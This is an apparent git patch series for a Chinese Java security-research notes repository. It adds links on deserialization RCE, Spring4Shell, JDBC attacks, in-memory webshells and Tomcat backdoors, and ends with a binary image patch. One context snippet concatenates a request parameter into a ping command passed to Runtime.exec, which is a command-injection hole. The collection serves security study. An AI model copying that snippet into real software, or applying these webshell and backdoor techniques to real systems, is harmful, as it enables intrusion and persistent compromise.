应用程序](https://blog.gdssecurity.com/labs/2017/10/10/pentesting-fast-infoset-based-web-applications-with-burp.html) **可能绕过xml** From a81dc98075b25ed06601298304969315454edc2c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 23 Mar 2022 00:58:38 +0800 Subject: [PATCH 014/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 82cb663..884dce9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -110,3 +110,4 @@ + 2022/03/15 [Shiro后渗透拓展面](https://tttang.com/archive/1472/) **扩展了思路agnet dump 获得key!** + 2022/03/16 [通过ql发现java gadgets](https://www.synacktiv.com/publications/finding-gadgets-like-its-2022.html) **可以参考文章的思路,sink和source,和中间的链。** + 2022/03/20 [使用 Burp 测试基于快速信息集的 Web 应用程序](https://blog.gdssecurity.com/labs/2017/10/10/pentesting-fast-infoset-based-web-applications-with-burp.html) **可能绕过xml** ++ 2022/03/23 [Linux下文件描述符回显构造](http://foreversong.cn/archives/1459) **理论上linux系统都可以通过fd文件描述符去获得回显,不仅仅是java语言,在想能不能有什么办法准确的获得fd(考虑各个因素)** From dfbb05b3da81bbd2250f97faaf8591637d5bf3d6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 23 Mar 2022 21:55:15 +0800 Subject: [PATCH 015/332] Update Readme.md --- Dubbo/Readme.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/Dubbo/Readme.md b/Dubbo/Readme.md index 22a00c8..83d0ac4 100644 --- a/Dubbo/Readme.md +++ b/Dubbo/Readme.md @@ -189,3 +189,8 @@ https://paper.seebug.org/1814/ ### Dubbo 2.7.8多个远程代码执行漏洞 https://xz.aliyun.com/t/8917 + +### CVE-2021-36162 + +[Apache Dubbo CVE-2021-36162 挖掘过程 +](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247487450&idx=1&sn=895a573a105cff858990df8bb88aafc5&chksm=c187cfcbf6f046ddbe75a826d851ebeafbcc7449e728a6be0e3ad60279ae7689ef14d4181757&mpshare=1&scene=23&srcid=0323KHKv3qtNyGs5a4jlCoz5&sharer_sharetime=1648033016703&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 935105488e6097385c9c1f6fad3592364bf83c24 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 28 Mar 2022 14:41:51 +0800 Subject: [PATCH 016/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 884dce9..2c16252 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -111,3 +111,4 @@ + 2022/03/16 [通过ql发现java gadgets](https://www.synacktiv.com/publications/finding-gadgets-like-its-2022.html) **可以参考文章的思路,sink和source,和中间的链。** + 2022/03/20 [使用 Burp 测试基于快速信息集的 Web 应用程序](https://blog.gdssecurity.com/labs/2017/10/10/pentesting-fast-infoset-based-web-applications-with-burp.html) **可能绕过xml** + 2022/03/23 [Linux下文件描述符回显构造](http://foreversong.cn/archives/1459) **理论上linux系统都可以通过fd文件描述符去获得回显,不仅仅是java语言,在想能不能有什么办法准确的获得fd(考虑各个因素)** ++ 2022/03/28 [内存Dump数据库密码的补充](https://mp.weixin.qq.com/s?__biz=Mzg2NDM2MTE5Mw==&mid=2247488363&idx=2&sn=cd23ae6069ce67dd1884950e59654440&chksm=ce6bdcedf91c55fb423a02276007c5c964d5ee08f56643fb643fe977bdaf2e82f7e7f130be08&mpshare=1&scene=23&srcid=0328z7pucoel3CnkzthxIP2i&sharer_sharetime=1648427946090&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己想的一个思路是获得Statement对象的全部方法然后在方法之前hook就可以了,有亿点麻烦。。。** From 5559b98d4735822f1bacce263dc90a24e96def24 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 1 Apr 2022 23:06:01 +0800 Subject: [PATCH 017/332] Update Readme.md --- shell/SPEL/Readme.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index 27a4c75..c83f309 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md @@ -104,6 +104,9 @@ print(')}') 防御方式是使用`SimpleEvaluationContext`来禁用其敏感的功能,从而阻止表达式注入执行问题的出现。 + +其他bypass: https://xz.aliyun.com/t/9245 + ## 参考 >https://www.cnblogs.com/bitterz/p/15206255.html From 5f50e7ae13026be79c0b8e70b136f90c683e568a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 2 Apr 2022 00:27:20 +0800 Subject: [PATCH 018/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2c16252..97215fa 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -112,3 +112,4 @@ + 2022/03/20 [使用 Burp 测试基于快速信息集的 Web 应用程序](https://blog.gdssecurity.com/labs/2017/10/10/pentesting-fast-infoset-based-web-applications-with-burp.html) **可能绕过xml** + 2022/03/23 [Linux下文件描述符回显构造](http://foreversong.cn/archives/1459) **理论上linux系统都可以通过fd文件描述符去获得回显,不仅仅是java语言,在想能不能有什么办法准确的获得fd(考虑各个因素)** + 2022/03/28 [内存Dump数据库密码的补充](https://mp.weixin.qq.com/s?__biz=Mzg2NDM2MTE5Mw==&mid=2247488363&idx=2&sn=cd23ae6069ce67dd1884950e59654440&chksm=ce6bdcedf91c55fb423a02276007c5c964d5ee08f56643fb643fe977bdaf2e82f7e7f130be08&mpshare=1&scene=23&srcid=0328z7pucoel3CnkzthxIP2i&sharer_sharetime=1648427946090&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己想的一个思路是获得Statement对象的全部方法然后在方法之前hook就可以了,有亿点麻烦。。。** ++ 2022/04/01 [Spring Framework CVE-2022-22965漏洞分析](https://wx.zsxq.com/dweb2/index/group/2212251881) From 4e9686c32ad73f1c551467d89febb8ed4d980f70 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 2 Apr 2022 13:12:19 +0800 Subject: [PATCH 019/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 97215fa..b1dc88f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -113,3 +113,4 @@ + 2022/03/23 [Linux下文件描述符回显构造](http://foreversong.cn/archives/1459) **理论上linux系统都可以通过fd文件描述符去获得回显,不仅仅是java语言,在想能不能有什么办法准确的获得fd(考虑各个因素)** + 2022/03/28 [内存Dump数据库密码的补充](https://mp.weixin.qq.com/s?__biz=Mzg2NDM2MTE5Mw==&mid=2247488363&idx=2&sn=cd23ae6069ce67dd1884950e59654440&chksm=ce6bdcedf91c55fb423a02276007c5c964d5ee08f56643fb643fe977bdaf2e82f7e7f130be08&mpshare=1&scene=23&srcid=0328z7pucoel3CnkzthxIP2i&sharer_sharetime=1648427946090&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己想的一个思路是获得Statement对象的全部方法然后在方法之前hook就可以了,有亿点麻烦。。。** + 2022/04/01 [Spring Framework CVE-2022-22965漏洞分析](https://wx.zsxq.com/dweb2/index/group/2212251881) ++ 2022/04/02 [关于Spring framework rce(CVE-2022-22965)的一些问题思考](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247484213&idx=1&sn=f975b31111e3029fa92b098ffa5c7933&chksm=c2a1d7bcf5d65eaaf5b3ef13ec9147b77866511f07ef04b33c5d8e6897e93121b2fbe1c86efd&mpshare=1&scene=23&srcid=0402nGSU5SdMSCyU5rXBMkvD&sharer_sharetime=1648875678204&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **通俗易懂** From f61e21a43aa1c232dd7b721f0a4149bb1c52670d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 4 Apr 2022 00:02:11 +0800 Subject: [PATCH 020/332] Update Readme.md --- "java\345\233\236\346\230\276/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\233\236\346\230\276/Readme.md" "b/java\345\233\236\346\230\276/Readme.md" index b2202a8..7932c5c 100644 --- "a/java\345\233\236\346\230\276/Readme.md" +++ "b/java\345\233\236\346\230\276/Readme.md" @@ -318,3 +318,4 @@ org.springframework.webflow.context.ExternalContextHolder.getExternalContext() >[前尘——返回执行结果的回显链](https://www.anquanke.com/post/id/253661) > >[Weblogic使用ClassLoader和RMI来回显命令执行结果](https://xz.aliyun.com/t/7228) +>[JAVA反序列化回显学习](https://cangqingzhe.github.io/2020/12/17/JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9B%9E%E6%98%BE%E5%AD%A6%E4%B9%A0/) 
From 4c85f1c4a5b92fff5a271abc0fb3cff3b3179170 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 5 Apr 2022 14:51:10 +0800 Subject: [PATCH 021/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b1dc88f..6bd854e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -114,3 +114,4 @@ + 2022/03/28 [内存Dump数据库密码的补充](https://mp.weixin.qq.com/s?__biz=Mzg2NDM2MTE5Mw==&mid=2247488363&idx=2&sn=cd23ae6069ce67dd1884950e59654440&chksm=ce6bdcedf91c55fb423a02276007c5c964d5ee08f56643fb643fe977bdaf2e82f7e7f130be08&mpshare=1&scene=23&srcid=0328z7pucoel3CnkzthxIP2i&sharer_sharetime=1648427946090&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己想的一个思路是获得Statement对象的全部方法然后在方法之前hook就可以了,有亿点麻烦。。。** + 2022/04/01 [Spring Framework CVE-2022-22965漏洞分析](https://wx.zsxq.com/dweb2/index/group/2212251881) + 2022/04/02 [关于Spring framework rce(CVE-2022-22965)的一些问题思考](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247484213&idx=1&sn=f975b31111e3029fa92b098ffa5c7933&chksm=c2a1d7bcf5d65eaaf5b3ef13ec9147b77866511f07ef04b33c5d8e6897e93121b2fbe1c86efd&mpshare=1&scene=23&srcid=0402nGSU5SdMSCyU5rXBMkvD&sharer_sharetime=1648875678204&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **通俗易懂** ++ 2022/04/05 [JAVA RMI 反序列化流程原理分析](https://xz.aliyun.com/t/2223) **rmi攻击的回显思路,通过异常回显** From 162dd59bb951bc1b55bd391db6adc3dbbcddc7a9 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 7 Apr 2022 11:14:48 +0800 Subject: [PATCH 022/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6bd854e..a7254dc 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -115,3 +115,4 @@ + 2022/04/01 [Spring Framework CVE-2022-22965漏洞分析](https://wx.zsxq.com/dweb2/index/group/2212251881) + 2022/04/02 [关于Spring framework rce(CVE-2022-22965)的一些问题思考](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247484213&idx=1&sn=f975b31111e3029fa92b098ffa5c7933&chksm=c2a1d7bcf5d65eaaf5b3ef13ec9147b77866511f07ef04b33c5d8e6897e93121b2fbe1c86efd&mpshare=1&scene=23&srcid=0402nGSU5SdMSCyU5rXBMkvD&sharer_sharetime=1648875678204&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **通俗易懂** + 2022/04/05 [JAVA RMI 反序列化流程原理分析](https://xz.aliyun.com/t/2223) **rmi攻击的回显思路,通过异常回显** ++ 2022/04/07 [(先知首发)从Jenkins RCE看Groovy代码注入](https://www.mi1k7ea.com/2020/08/26/%E4%BB%8EJenkins-RCE%E7%9C%8BGroovy%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5) From 8db5c7b657acb28bc35e72c213e709fc7703ae5e Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Apr 2022 17:45:46 +0800 Subject: [PATCH 023/332] Update Readme.md --- "java\345\206\205\345\255\230\351\251\254/Readme.md" | 3 +++ 1 file changed, 3 insertions(+) diff --git "a/java\345\206\205\345\255\230\351\251\254/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Readme.md" index bf4e168..6f317b8 100644 --- "a/java\345\206\205\345\255\230\351\251\254/Readme.md" +++ "b/java\345\206\205\345\255\230\351\251\254/Readme.md" @@ -7,6 +7,9 @@ + [JavaWeb 内存马二周目通关攻略](https://su18.org/post/memory-shell-2/) + [【原创】利用“进程注入”实现无文件不死webshell](https://www.cnblogs.com/rebeyond/p/9686213.html) +## springboot ++ [利用 intercetor 注入 spring 内存 webshell](https://landgrey.me/blog/19/) + ## 后门 + [一种tomcat中间件留持久化后门的思路](https://gv7.me/articles/2021/an-idea-of-keeping-persistent-backdoor-in-tomcat-middleware/) From 1867756b8ca751eae95ccb30f037c57bc7c38a21 Mon Sep 17 00:00:00 2001 
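Review bot: `intercetor` in the link text added under `## springboot` in `java内存马/Readme.md` looks like a misspelling of `interceptor`, which makes the entry hard to find by search. If that is the linked article's own title, keep it and put the correct spelling in a short bold note after the link, as the other READMEs in this series do for their summaries.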
From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Apr 2022 17:59:12 +0800 Subject: [PATCH 024/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a7254dc..f4b5196 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -116,3 +116,4 @@ + 2022/04/02 [关于Spring framework rce(CVE-2022-22965)的一些问题思考](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247484213&idx=1&sn=f975b31111e3029fa92b098ffa5c7933&chksm=c2a1d7bcf5d65eaaf5b3ef13ec9147b77866511f07ef04b33c5d8e6897e93121b2fbe1c86efd&mpshare=1&scene=23&srcid=0402nGSU5SdMSCyU5rXBMkvD&sharer_sharetime=1648875678204&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **通俗易懂** + 2022/04/05 [JAVA RMI 反序列化流程原理分析](https://xz.aliyun.com/t/2223) **rmi攻击的回显思路,通过异常回显** + 2022/04/07 [(先知首发)从Jenkins RCE看Groovy代码注入](https://www.mi1k7ea.com/2020/08/26/%E4%BB%8EJenkins-RCE%E7%9C%8BGroovy%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5) ++ 2022/04/09 [Spring Boot拦截器(Interceptor)详解](https://juejin.cn/post/6844904020675559432) **注入interceptor的基础** From ecaa3e521547d69dd09b3daebc4385002884920a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Apr 2022 19:14:36 +0800 Subject: [PATCH 025/332] Update Readme.md --- "java\345\206\205\345\255\230\351\251\254/Readme.md" | 3 +++ 1 file changed, 3 insertions(+) diff --git "a/java\345\206\205\345\255\230\351\251\254/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Readme.md" index 6f317b8..c44dec8 100644 --- "a/java\345\206\205\345\255\230\351\251\254/Readme.md" +++ "b/java\345\206\205\345\255\230\351\251\254/Readme.md" 
@@ -10,6 +10,9 @@ ## springboot + [利用 intercetor 注入 spring 内存 webshell](https://landgrey.me/blog/19/) +## spring ++ [基于内存 Webshell 的无文件攻击技术研究](https://landgrey.me/blog/12/) + ## 后门 + [一种tomcat中间件留持久化后门的思路](https://gv7.me/articles/2021/an-idea-of-keeping-persistent-backdoor-in-tomcat-middleware/) From 116ba9c9d767e4cbf081900e83a2f1e5f93ff476 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 10 Apr 2022 17:14:17 +0800 Subject: [PATCH 026/332] Update Readme.md --- "java\345\206\205\345\255\230\351\251\254/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\206\205\345\255\230\351\251\254/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Readme.md" index c44dec8..b44acd1 100644 --- "a/java\345\206\205\345\255\230\351\251\254/Readme.md" +++ "b/java\345\206\205\345\255\230\351\251\254/Readme.md" @@ -12,6 +12,7 @@ ## spring + [基于内存 Webshell 的无文件攻击技术研究](https://landgrey.me/blog/12/) ++ [前尘——内存中无处可寻的木马](https://www.anquanke.com/post/id/253475) ## 后门 + [一种tomcat中间件留持久化后门的思路](https://gv7.me/articles/2021/an-idea-of-keeping-persistent-backdoor-in-tomcat-middleware/) From 3659c6ff5b244f4194253979f3bf5cda1956e6ff Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 14 Apr 2022 11:52:16 +0800 Subject: [PATCH 027/332] Update Readme.md --- Jdbc/Readme.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/Jdbc/Readme.md b/Jdbc/Readme.md index 23848a2..a9a133a 100644 --- a/Jdbc/Readme.md +++ b/Jdbc/Readme.md 
@@ -2,3 +2,8 @@ >JDBC(Java DataBase Connectivity)是Java和数据库之间的一个桥梁,是一个 规范 而不是一个实现,能够执行SQL语句。它由一组用Java语言编写的类和接口组成。各种不同类型的数据库都有相应的实现。 + MySQL JDBC 客户端反序列化漏洞[参考文章](https://xz.aliyun.com/t/8159) [自己调试的漏洞点](./img/1.png) [自己调试的漏洞点](./img/2.png)**J简单的说:在JDBC连接MySQL的过程中,执行了SHOW SESSION STATUS语句。而如果我们控制返回的结果是一个恶意的对象,jdbc就会去执行readobject方法反序列化,从而有入口点,在利用cc链,完美rce。** + +## 其他利用 +jdbc 利用方式太多了,慢慢学习(重学) + ++ [由CVE-2022-21724引申jdbc漏洞](https://mp.weixin.qq.com/s?__biz=MzUzNDMyNjI3Mg==&mid=2247485275&idx=1&sn=e06b07579ecef87f8cce4536d25789ce&chksm=fa973a34cde0b322ef3949c2cf7fc6bf31e945674d2fe313a3dbf63504bdf737f05cba65de18&mpshare=1&scene=23&srcid=0414XqOEScLh3JIaaHk9pp4v&sharer_sharetime=1649906865169&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 6fca95ef35e73c7cc564eae25fad9c60a09dc64c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 16 Apr 2022 12:29:02 +0800 Subject: [PATCH 028/332] Update Readme.md --- shell/Readme.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/shell/Readme.md b/shell/Readme.md index b234df4..9f01e86 100644 --- a/shell/Readme.md +++ b/shell/Readme.md @@ -33,3 +33,6 @@ public void cmd(@RequestParam String command) throws Exception { Command = "ping 127.0.0.1"+request.getParameter("cmd"); Runtime.getRuntime().exec(command); ``` +## webshell 管理工具 + ++ [菜刀HTTP流量中转代理过WAF](https://xz.aliyun.com/t/2739) **现在来说就是bx和gsl了** From 36a6bca62f530bb333faa0d5795999e73b279d0e Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 19 Apr 2022 11:50:21 +0800 Subject: [PATCH 029/332] Add files via upload --- image.png | Bin 0 -> 218278 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 image.png 
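Review bot: the link added at the end of the `Jdbc/Readme.md` hunk (`由CVE-2022-21724引申jdbc漏洞`) still carries the WeChat share-tracking parameters `mpshare`, `scene`, `srcid`, `sharer_sharetime` and `sharer_shareid`, which describe who shared the article and when rather than the article itself. Trim the URL to the `__biz`, `mid`, `idx` and `sn` parameters (keeping `chksm` only if the link fails without it) so the README does not publish the sharer's identifier. The new entry also has no bold summary, unlike the MySQL JDBC entry above it, so a one-line note on what it covers would help.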
diff --git a/image.png b/image.png new file mode 100644 index 0000000000000000000000000000000000000000..2fb9c1529890a496c6c4d52b113f5ca963239b25 GIT binary patch literal 218278
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 
